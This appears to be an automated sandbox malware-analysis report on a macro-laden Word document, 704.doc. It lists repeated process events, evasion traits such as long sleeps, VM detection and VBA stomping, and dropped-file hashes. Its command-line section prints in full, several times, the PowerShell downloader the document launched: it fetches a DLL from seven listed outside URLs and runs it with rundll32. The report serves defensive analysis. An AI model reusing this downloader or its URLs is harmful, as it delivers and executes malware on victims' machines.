Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Contains functionality to detect virtual machines (SLDT)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_000007FF00260F3C sldt word ptr [eax]

4_2_000007FF00260F3C

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp

Anti Debugging:

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: 704.doc	OLE indicator, VBA stomping: true
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE indicator, VBA stomping: true

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe

Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

ID:	526268
Product:	CloudBasic
Start time:	13:15:10
Start date:	22.11.2021
Sample:	704.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	40f85d07da2533d576b1f2d7c043a2da
SHA1:	60b84d70a6511483c6de131fb62e30a99edff5c4
SHA256:	d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
Filetype:	Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F744DDE.png	PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced	D3C11BC087FAF4372F4C5D37E06FCFFD	40A9FE4D47DADFDB1463D63F14D6D60641AC19E5	6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp	Composite Document File V2 Document, Cannot read section info	CE9E5A2954866976632E497655B1882B	D1518E3C3269FD2E6512D6045A463CBE09211E99	75A2A12D357329BB6C6CAC8730CDA50728B0A37B53DEE4D585F00F235607E45E
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8907FAB7-1F61-4790-AB28-47403D75A993}.tmp	data	32649384730B2D61C9E79D46DE589115	053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4	E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB899D35-EEB1-4849-9BF6-6658C3435874}.tmp	data	582FA24D082E9486E72A1B9681CDF97B	CB23EE4B0A2D6188A7C39562DB5B4AA8A9C4FBB9	F857A260E9DC18D6B5A51207FAC4F1A8A985840E8132CCFB324DEAC36DF67145
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd	data	4E827FA2947FDADD8926FF58D42BC7E9	65C90AB768A1D7FBABB6F1C719110DA6FD5D9B12	5CD589A641061016C526FCB4220895E8A323BB7DCC27FC6C540A9BA594A7750B
C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP	Composite Document File V2 Document, Cannot read section info	3AD53E44E66D3E083F7DF8F643C4CA3E	44B4AB308D072BADDFD8C7138508F11A4FB0F9BF	1CE1F8D3E16D8DB7F0B001101283CD500B3DC59073AD01400D18E6BF4F6AFCFA
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\704.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:59 2021, mtime=Mon Aug 30 20:08:59 2021, atime=Mon Nov 22 20:15:18 2021, length=136531, window=hide	0014D6DE553BD69E527052AF58AC3A74	B61ADCFD29FD6F5BE647FAB62F82B4D2B319C22D	CC1F9F876CB4A4CF9838CE5FB0B9DF6ED8F1A16A2AB387694CD5CA1DC52A714B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	2B1A3D4E9531BB7AAAEEE91097C6E6C8	CDCB8BB8DF9FDC8AE6C9B4E7B3FA485B8075C74B	7C5B1F305E5CDABE223B67B449800F306C63D8B354CA4A21F1C8C20E909EC8E1
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	45B1E2B14BE6C1EFC217DCE28709F72D	64E3E91D6557D176776A498CF0776BE3679F13C3	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)	data	8F22547DE16012FD240D42D18B0C5959	0B61D0A635BC93922E916B17EC50B9360EB3B752	7CD9D5910D7CD1976ABC501A7115AB590611E139043382C83574ADE07AF79921
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J29WGVF1UDYP81V0IINR.temp	data	8F22547DE16012FD240D42D18B0C5959	0B61D0A635BC93922E916B17EC50B9360EB3B752	7CD9D5910D7CD1976ABC501A7115AB590611E139043382C83574ADE07AF79921
